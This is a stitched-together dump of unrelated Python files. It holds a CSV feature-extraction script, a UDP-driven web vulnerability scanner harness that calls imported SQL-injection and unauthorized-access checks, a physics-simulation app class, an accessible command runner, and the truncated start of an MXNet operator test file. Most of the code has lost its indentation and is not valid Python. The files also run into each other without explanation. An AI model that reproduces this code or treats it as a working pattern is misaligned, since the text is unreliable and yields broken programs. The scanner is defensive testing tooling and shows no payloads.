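# readmaker: loads a CSV (defaulting to today's IS_CMR export), drops the columns listed in 'kill',
# adds string-typed copies of the columns in 'ConverTOstrings', and expands each free-text column in
# 'educational' into per-word feature columns via infermeaning().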
def readmaker(x=0,kill=[],educational=[],ConverTOstrings=[]):
import csv
import random
import datetime
now = datetime.datetime.now()
if len(str(now.month))==1:
t='0'+str(now.month)
else:
t=str(now.month)
if len(str(now.day))==1:
y='0'+str(now.day)
else:
y=str(now.day)
if x==0:
x='\\\\wcrwvfilprd01\\shared$\\Telecoms Reporting\\QlikView nPrinting Output\\CMR\\IS_CMR_' + str(now.year) + '-' + t + '-' + y + '.csv'
def infermeaning(reader,column):
text=''
textlist=[]
corpuscount={}
count=0
average=0
import math
for row in reader:
intext=[]
text=row.get(column)
if text !='':
if text:
textlist=text.split()
for t in textlist:
count+=1
if t in corpuscount:
corpuscount[t]+=1
else:
corpuscount[t]=1
for c in corpuscount:
corpuscount[c]=math.log(count/corpuscount[c])
average+=corpuscount[c]
average=average/count
newcorpuscount={}
for c in corpuscount:
if corpuscount[c] > average:
newcorpuscount[c]=corpuscount[c]
for row in reader:
text=row.get(column)
textlist=text.split()
            for t in textlist:
if t in newcorpuscount:
row[t]=t
del row[column]
return reader
with open(x, newline='') as csvfile:
data = csv.DictReader(csvfile)
reader = [item for item in data]
newreader=[]
data=None
count=0
for row in reader:
for k in kill:
try:
del row[k]
except:
pass
for con in ConverTOstrings:
row["StrVer:"+str(con)]=con + ':' + str(row[con])
for e in educational:
reader=infermeaning(reader,e)
return reader
def ratiosplit(reader,ratio):
count=0
ratioreader=[]
oldreader=[]
for row in reader:
count+=1
newrow=row.copy()
if count % ratio==0:
ratioreader.append(newrow)
else:
oldreader.append(newrow)
return [oldreader,ratioreader]
#SECTION TO SET UP FOR YOUR OWN DATA - ONE # = CODE LINE, MULTIPLE ##### = NOTES
#####DECLARE TIME
##NOW=datetime.datetime.now()
#print(datetime.datetime.now())
##### ADD NAME OF FIELD TO CONVERTS TO CONVERT SOMETHING TO STRING
#converts=[]
##### EDUCATIONAL WILL SPLIT A COMMENTS FIELD
#edX=[]
##### KILL WILL DROP A FIELD
#kill=[]
##### x IS required as a raw string giving the filepath of the CSV you want it to use
#x=r''
##### below line creates a list containing ordered dicts from the CSV that represents the source data
#r=readmaker(x=x,kill=kill,educational=edX,ConverTOstrings=converts)
##### splits the data, assuming a ratio of 5 learn to 1 test (change to taste); relies on the data being sorted - hint: I suggest sorting on the key
#r=ratiosplit(r,5)
#r2=r[1]
#r=r[0]
##### relies on knowing the key column of the CSV
#lockpick='KEY AS READ FROM THE CSV - NEEDS THE LEADING BOM CHARACTER (\ufeff) BEFORE THE KEY STRING'
#update='KEY WITHOUT THE BOM - RENAMES THE KEY AND REMOVES THE BOM FOR THE FINAL OUTPUT'
##### START AND END
#START='FIELD NAME OF START DATE'
#END='FIELD NAME OF END DATE'
#ACCURACY=NUMBER OF DAYS YOU FIND AN ACCEPTABLE "CORRECT FORECAST"
#csvloci=r''
##### SUGGESTED: r'C:\CSVs\\' - FILE LOCATION TO OUTPUT DATA AND BUILD THE DATABASE. AS LONG AS IT IS POINTED AT THE SAME LOCATION EACH TIME, THE SAME AI WILL BE REUSED
##### THE CODE THAT BUILDS MINDS - DON'T CHANGE UNLESS YOU HAVE READ THE FULL CODE
#countalot=0
#for i in range(100):
# countalot+=1
# myhive=hivemind(r,lockpick,START,END,update,start=1,accuracy=ACCURACY,csvloci=csvloci)
# myhive.multitest(r2,str("Random Test "+str(datetime.datetime.now())+" (1 in 5 chosen to test) Epoch: " + str(countalot)))
#print((datetime.datetime.now()-NOW))
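# --- Hedged example: a minimal end-to-end sketch of the setup described above. ---
# Everything in this function is hypothetical: the CSV path, column names, key prefix and
# accuracy window are placeholders and must be replaced with values from your own data.
def example_setup():
    import datetime
    x = r'C:\CSVs\my_source_data.csv'         # hypothetical input CSV
    r = readmaker(x=x, kill=[], educational=[], ConverTOstrings=[])
    r = ratiosplit(r, 5)                       # 5 learn : 1 test, as suggested above
    r2 = r[1]
    r = r[0]
    lockpick = '\ufeffTicketID'                # hypothetical key as read from the CSV (assumed BOM prefix)
    update = 'TicketID'                        # hypothetical key name for the final output
    START = 'OpenDate'                         # hypothetical start-date field
    END = 'CloseDate'                          # hypothetical end-date field
    ACCURACY = 7                               # placeholder: days counted as a "correct forecast"
    csvloci = r'C:\CSVs\\'
    myhive = hivemind(r, lockpick, START, END, update, start=1, accuracy=ACCURACY, csvloci=csvloci)
    myhive.multitest(r2, 'Example test ' + str(datetime.datetime.now()))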
|
mossbackScaner.py
|
# -*- coding: utf-8 -*-
# version: 0.2
# date: 2020.09.22
import json
import re
import socket
import sys
import http.client
import time
import threading
from socket import *
from time import ctime
import hashlib
import subprocess
from subprocess import PIPE
from scanner_sqli import test_sqli
from scanner_unauth_access import test_unauth_access
from color_print import *
global glo_conf
global glo_pkg_list
global glo_lock
global glo_scanner
def scanner_factory(name):
return eval(name + "()")
with open('config.json', 'r') as fp:
glo_conf = json.loads(fp.read())
glo_pkg_list = []
glo_lock = threading.Lock()
glo_scanner = []
glo_scanner.append(scanner_factory("test_sqli"))
glo_scanner.append(scanner_factory("test_unauth_access"))
def do_scan_thread():
global glo_pkg_list
global glo_lock
global glo_scanner
while True:
glo_lock.acquire()
if len(glo_pkg_list) > 0:
pkg = json.loads(glo_pkg_list.pop(0))
glo_lock.release()
# do all test here
for fun in glo_scanner:
fun.run(pkg['method'], pkg['uri'], pkg['version'],
pkg['header'], pkg['body'], pkg['host'])
# test finished
else:
glo_lock.release()
time.sleep(1)
def main():
global glo_pkg_list
global glo_lock
global glo_conf
t = threading.Thread(target=do_scan_thread, args=())
t.start()
BUFSIZ = 1024
ADDRESS = ('', glo_conf['scanner_port'])
udpServerSocket = socket(AF_INET, SOCK_DGRAM)
udpServerSocket.bind(ADDRESS)
while True:
# pack_meta = pack_len(4 B) + pack_hash(32 B)
pack_meta, pack_from = udpServerSocket.recvfrom(36)
pack_meta = pack_meta.decode()
pack_data = ''
for i in range(int(pack_meta[:4])):
data, _ = udpServerSocket.recvfrom(BUFSIZ)
pack_data += data.decode()
m = hashlib.md5()
m.update(pack_data.encode())
if pack_meta[4:] != m.hexdigest():
            printDarkRed("[ERROR] The hash of the received message is incorrect.")
udpServerSocket.sendto("ER".encode('utf-8'), pack_from)
else:
udpServerSocket.sendto("OK".encode('utf-8'), pack_from)
glo_lock.acquire()
glo_pkg_list.append(pack_data)
glo_lock.release()
udpServerSocket.close()
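# --- Hedged example (not part of the original tool): a minimal sender-side sketch showing the packet
# format main() expects: a 36-byte meta packet ("%04d" chunk count + 32-char md5 hex of the payload)
# followed by the payload in BUFSIZ-sized chunks. The payload is assumed to be a JSON object with the
# keys do_scan_thread() reads (method, uri, version, header, body, host); host/port are placeholders.
def send_to_scanner(payload, host='127.0.0.1', port=8888, bufsiz=1024):
    chunks = [payload[i:i + bufsiz] for i in range(0, len(payload), bufsiz)]
    meta = '%04d' % len(chunks) + hashlib.md5(payload.encode()).hexdigest()
    sock = socket(AF_INET, SOCK_DGRAM)
    sock.sendto(meta.encode(), (host, port))
    for chunk in chunks:
        sock.sendto(chunk.encode(), (host, port))
    reply, _ = sock.recvfrom(2)  # the scanner replies "OK" or "ER"
    sock.close()
    return reply.decode() == 'OK'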
if __name__ == "__main__":
main()
|
app.py
|
# coding=utf-8
from __future__ import print_function
import inspect
import logging
import numbers
import os
import sys
import threading
import time
import warnings
from os.path import isfile
import numpy as np
import six
from phi import struct
from phi.data.fluidformat import Scene, write_sim_frame
from phi.physics.field import CenteredGrid, Field, StaggeredGrid
from phi.physics.world import StateProxy, world
from phi.viz.plot import PlotlyFigureBuilder
from .control import Action, Control
from .value import (EditableBool, EditableFloat, EditableInt, EditableString, EditableValue)
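# Decorator that serializes calls to the decorated method: a lazily created per-instance lock
# (guarded by a shared outer lock while it is being created) ensures only one call runs at a time.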
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = '__' + method.__name__ + '_lock' + '__'
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name):
setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
class App(object):
def __init__(self,
name=None,
subtitle='',
fields=None,
stride=None,
record_images=False, record_data=False,
base_dir='~/phi/data/',
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None,
framerate=None,
dt=1.0):
self.start_time = time.time()
self.name = name if name is not None else self.__class__.__name__
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name, generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.steps = 0
self._invalidation_counter = 0
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
self.detect_fields = 'default' # False, True, 'default'
self.world = world
self.dt = dt
# Setup directory & Logging
self.objects_to_save = [self.__class__] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath('info.log')):
log_file = self.log_file = self.scene.subpath('info.log')
else:
index = 2
while True:
log_file = self.scene.subpath('info_%d.log' % index)
if not isfile(log_file):
break
else:
index += 1
# Setup logging
        logFormatter = logging.Formatter('%(message)s (%(levelname)s), %(asctime)s\n')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.WARNING)
customLogger = logging.Logger('app', logging.DEBUG)
fileHandler = logging.FileHandler(log_file)
fileHandler.setFormatter(logFormatter)
customLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
customLogger.addHandler(consoleHandler)
self.logger = customLogger
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride if stride is not None else 1
self.framerate = framerate if framerate is not None else stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self.info('App created. Scene directory is %s' % self.scene.path)
def new_scene(self, count=None):
if count is None:
count = 1 if self.world.batch_size is None else self.world.batch_size
self.scene = Scene.create(self.base_dir, self.scene_summary(), count=count, mkdir=True)
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath('images')
def get_image_dir(self):
return self.scene.subpath('images', create=True)
def progress(self):
self.step()
self.steps += 1
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
world.step(dt=self.dt)
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if fieldname not in self.fields:
raise KeyError('Field %s not declared. Available fields are %s' % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, value):
assert not self.prepared, 'Cannot add fields to a prepared model'
if isinstance(value, StateProxy):
def current_state():
return value.state
generator = current_state
elif callable(value):
generator = value
else:
assert isinstance(value, (np.ndarray, Field, float, int)), 'Unsupported type for field "%s": %s' % (name, type(value))
def get_constant():
return value
generator = get_constant
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == '':
self.message = display_name(action.name)
else:
self.message += ' | ' + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, 'Cannot add traits to a prepared model'
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info('Gathering model data...')
# Controls
for name in self.__dict__:
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith('value_'):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith('action_') and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Default fields
if len(self.fields) == 0:
self._add_default_fields()
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
try:
source_files_to_save.add(inspect.getabsfile(object))
except TypeError:
pass
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
# End
self.prepared = True
return self
def _add_default_fields(self):
def add_default_field(trace):
field = trace.value
if isinstance(field, (CenteredGrid, StaggeredGrid)):
def field_generator():
world_state = self.world.state
return trace.find_in(world_state)
self.add_field(field.name[0].upper() + field.name[1:], field_generator)
return None
struct.map(add_default_field, self.world.state, leaf_condition=lambda x: isinstance(x, (CenteredGrid, StaggeredGrid)), trace=True, content_type=struct.INVALID)
def add_custom_property(self, key, value):
self._custom_properties[key] = value
if self.prepared:
self._update_scene_properties()
def add_custom_properties(self, dictionary):
self._custom_properties.update(dictionary)
if self.prepared:
self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene:
return
try:
app_name = os.path.basename(inspect.getfile(self.__class__))
app_path = inspect.getabsfile(self.__class__)
except TypeError:
app_name = app_path = ''
properties = {
'instigator': 'App',
'traits': self.traits,
'app': str(app_name),
'app_path': str(app_path),
'name': self.name,
'description': self.subtitle,
'all_fields': self.fieldnames,
'actions': [action.name for action in self.actions],
'controls': [{control.name: control.value} for control in self.controls],
'summary': self.scene_summary(),
'time_of_writing': self.steps,
'world': struct.properties_dict(self.world.state)
}
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return ''.join([
' ' + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
message = str(message)
self.message = message
self.logger.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def show(self, *args, **kwargs):
warnings.warn("Use show(model) instead.", DeprecationWarning, stacklevel=2)
from phi.viz.display import show
show(self, *args, **kwargs)
@property
def status(self):
pausing = '/Pausing' if self._pause and self.current_action else ''
action = self.current_action if self.current_action else 'Idle'
message = (' - %s' % self.message) if self.message else ''
return '{}{} ({}){}'.format(action, pausing, self.steps, message)
def run_step(self, framerate=None, allow_recording=True):
self.current_action = 'Running'
starttime = time.time()
try:
self.progress()
if allow_recording and self.steps % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0 / framerate - duration
if rest > 0:
self.current_action = 'Waiting'
time.sleep(rest)
except Exception as e:
self.info('Error during %s.step() \n %s: %s' % (type(self).__name__, type(e).__name__, e))
self.logger.exception(e)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True, callback_if_aborted=False):
if framerate is None:
framerate = self.framerate
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
if not self._pause or callback_if_aborted:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = 'Recording'
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.steps, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered_tensor() if isinstance(a, StaggeredGrid) else a.data for a in arrays]
names = [n.lower() for n in self.recorded_fields]
files += write_sim_frame(self.directory, arrays, names, self.steps)
if files:
self.message = 'Frame written to %s' % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=np.inf, allow_recording=False)
step_count += 1
if self._pause:
break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1, len(n)):
if n[i] == '_':
n[i] = ' '
if len(n) > i + 1:
n[i + 1] = n[i + 1].upper()
return ''.join(n)
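# Illustrative examples (not in the original source): display_name('record_images') -> 'Record Images',
# display_name('dt') -> 'Dt'.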
|
AccessibleRunner.py
|
# TODO
# * Resize the command output textbox together with the window.
# * Make the size of the help dialog relative to the desktop size.
import os
import sys
import wx
import re
import psutil
import accessible_output2.outputs.auto
from subprocess import call, Popen, PIPE, STDOUT
from threading import Thread
from playsound import playsound
from cefpython3 import cefpython as cef
from config import Config
from gui import MainFrame
ON_WINDOWS = os.name == 'nt'
# Main application class.
class AccessibleRunner:
# Maximum number of items in the commands history.
COMMANDS_HISTORY_LIMIT = 10
# Maximum number of items in the working directories history.
DIRECTORIES_HISTORY_LIMIT = 10
# Maximum number of items in the find texts history
FIND_TEXTS_HISTORY_LIMIT = 10
# Maximum number of items in the line substitution regular expression history
SUBSTITUTION_REGEXES_HISTORY_LIMIT = 10
# Maximum number of items in the line substitution replacement history
SUBSTITUTION_REPLACEMENTS_HISTORY_LIMIT = 10
# Paths to sounds directory and files
SOUNDS_PATH = 'sounds/'
SUCCESS_SOUND_PATH = SOUNDS_PATH + 'success.mp3'
ERROR_SOUND_PATH = SOUNDS_PATH + 'error.mp3'
NOT_FOUND_SOUND_PATH = SOUNDS_PATH + 'Windows Background.wav'
# Initializes the object.
def __init__(self, config):
self.config = config
self.active = True
self.process = None
self.sr = accessible_output2.outputs.auto.Auto()
# Sets the UI object for this runner.
def setUI(self, ui):
self.ui = ui
# Sets the active state of the application to the given value.
def setActive(self, active):
self.active = active
    # Runs the given command in a new process starting in the given working directory. The "useShell" parameter indicates if the command should be executed through the shell.
def runProcess(self, command, directory, useShell):
if self.process is not None:
return
# Add the command and directory to the history and ensure that blank or whitespace working directory value means the current working directory should be used
self.addToCommandsHistory(command)
if directory.strip() == '':
directory = None
self.addToDirectoriesHistory(directory)
# On Windows, set the proper code page for console
# See https://stackoverflow.com/questions/67524114/python-how-to-decode-file-names-retrieved-from-dir-command-using-subprocess
if ON_WINDOWS:
call(['chcp', '65001'], shell = True)
# Try running the command
try:
self.process = Popen(command, cwd = directory, shell = useShell, stdout = PIPE, stderr = STDOUT, stdin = PIPE)
except (NotADirectoryError, FileNotFoundError):
errorMessage = 'Error: The working directory \'{}\' does not exist.\n'.format(directory)
self.ui.setOutput(errorMessage, True)
self.srOutput(errorMessage)
self.ui.setAsNotRunning()
else:
# Start fetching the process output in a new thread
thread = Thread(target = self.fetchOutput, args = (self.process.stdout, None))
thread.daemon = True # Thread dies with the program
thread.start()
self.ui.setAsRunning()
# Cleans everything on exit, including saving the changes to the config file.
def clean(self):
self.killProcessTree()
self.config.saveToFile()
# Adds the given item to the given history record with the given limit and returns the new items list.
def addToHistory(self, item, record, limit):
        if item is None or item.strip() == '':
return
items = self.config.history[record]
# If the item already exists in the history, remove it
try:
index = items.index(item)
items.pop(index)
except:
pass
        # Add the item to the beginning of the history
items.insert(0, item)
        # Remove the items which exceed the history limit (trim in place so the stored history is capped too)
        del items[limit:]
        return items
# Adds the given command to the history.
def addToCommandsHistory(self, command):
commands = self.addToHistory(command, 'commands', AccessibleRunner.COMMANDS_HISTORY_LIMIT)
# Set the new command choices
self.ui.setCommandChoices(commands)
# Adds the given directory to the history.
def addToDirectoriesHistory(self, directory):
if directory is None:
return
directories = self.addToHistory(os.path.normpath(directory), 'directories', AccessibleRunner.DIRECTORIES_HISTORY_LIMIT)
# Set the new directory choices
self.ui.setDirectoryChoices(directories)
# Adds the given find text to the history.
def addToFindTextsHistory(self, findText):
self.addToHistory(findText, 'findTexts', AccessibleRunner.FIND_TEXTS_HISTORY_LIMIT)
# Adds the given line substitution regular expression to the history.
def addToSubstitutionRegexesHistory(self, regex):
self.addToHistory(regex, 'substitutionRegexes', AccessibleRunner.SUBSTITUTION_REGEXES_HISTORY_LIMIT)
# Merges the given settings with the config settings dictionary.
def mergeSettings(self, settings):
self.config.settings.update(settings)
# Adds the given line substitution replacement to the history.
def addToSubstitutionReplacementsHistory(self, replacement):
self.addToHistory(replacement, 'substitutionReplacements', AccessibleRunner.SUBSTITUTION_REPLACEMENTS_HISTORY_LIMIT)
# Clears the command output.
def clearOutput(self):
self.ui.setOutput('')
# Copies the command output string to the system clipboard.
def copyOutput(self):
if not wx.TheClipboard.IsOpened():
wx.TheClipboard.Open()
data = wx.TextDataObject()
data.SetText(self.ui.getOutput())
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
# Kills the currently running process and all its child processes.
def killProcessTree(self):
if not self.process:
return
parent = psutil.Process(self.process.pid)
children = parent.children(recursive = True)
for child in children:
child.kill()
psutil.wait_procs(children, timeout = 5)
try:
parent.kill()
parent.wait(5)
except:
pass
self.process = None
self.ui.setAsNotRunning()
# Plays the sound at the given path asynchronously.
def play(self, path):
thread = Thread(target = playsound, args = (path, None))
thread.daemon = True # Thread dies with the program
thread.start()
# Plays the success sound.
def playSuccess(self):
self.play(AccessibleRunner.SUCCESS_SOUND_PATH)
# Plays the error sound.
def playError(self):
self.play(AccessibleRunner.ERROR_SOUND_PATH)
# Plays the not found sound.
def playNotFound(self):
self.play(AccessibleRunner.NOT_FOUND_SOUND_PATH)
# Outputs the given text via screen reader, optionally interrupting the current output.
def srOutput(self, text, interrupt = False):
# Output only if screen reader is running
if not self.sr.is_system_output():
self.sr.output(text, interrupt = interrupt)
# Waits for the process output and continuously writes it to the command output. Depending on the current settings, plays success and error sounds if regular expression matches output line.
def fetchOutput(self, out, arg):
settings = self.config.settings
for line in iter(out.readline, b''):
lineString = line.decode()
# Apply the regex based line substitution if enabled
if settings['lineSubstitution']:
lineString = re.sub(settings['substitutionRegex'], settings['substitutionReplacement'], lineString)
isOutputOn = self.ui.isOutputOn()
# Output the line via screen reader if the output is on and if the main frame is active or if background output is turned on
if isOutputOn and (self.active or self.config.settings['srBgOutput']):
self.srOutput(lineString)
# Play sound if success regex matches
if settings['playSuccessSound']:
match = re.search(settings['successRegex'], lineString)
if match is not None:
self.playSuccess()
# Play sound if error regex matches
if settings['playErrorSound']:
match = re.search(settings['errorRegex'], lineString)
if match is not None:
self.playError()
# Append the line to the UI output if the output is on
if isOutputOn:
self.ui.setOutput(lineString, True)
out.close()
self.process = None
self.ui.setAsNotRunning()
# Main function.
def main():
app = wx.App()
config = Config()
runner = AccessibleRunner(config)
mainFrame = MainFrame(runner, config, title = MainFrame.WINDOW_TITLE)
runner.setUI(mainFrame)
app.MainLoop()
del app
cef.Shutdown()
main()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
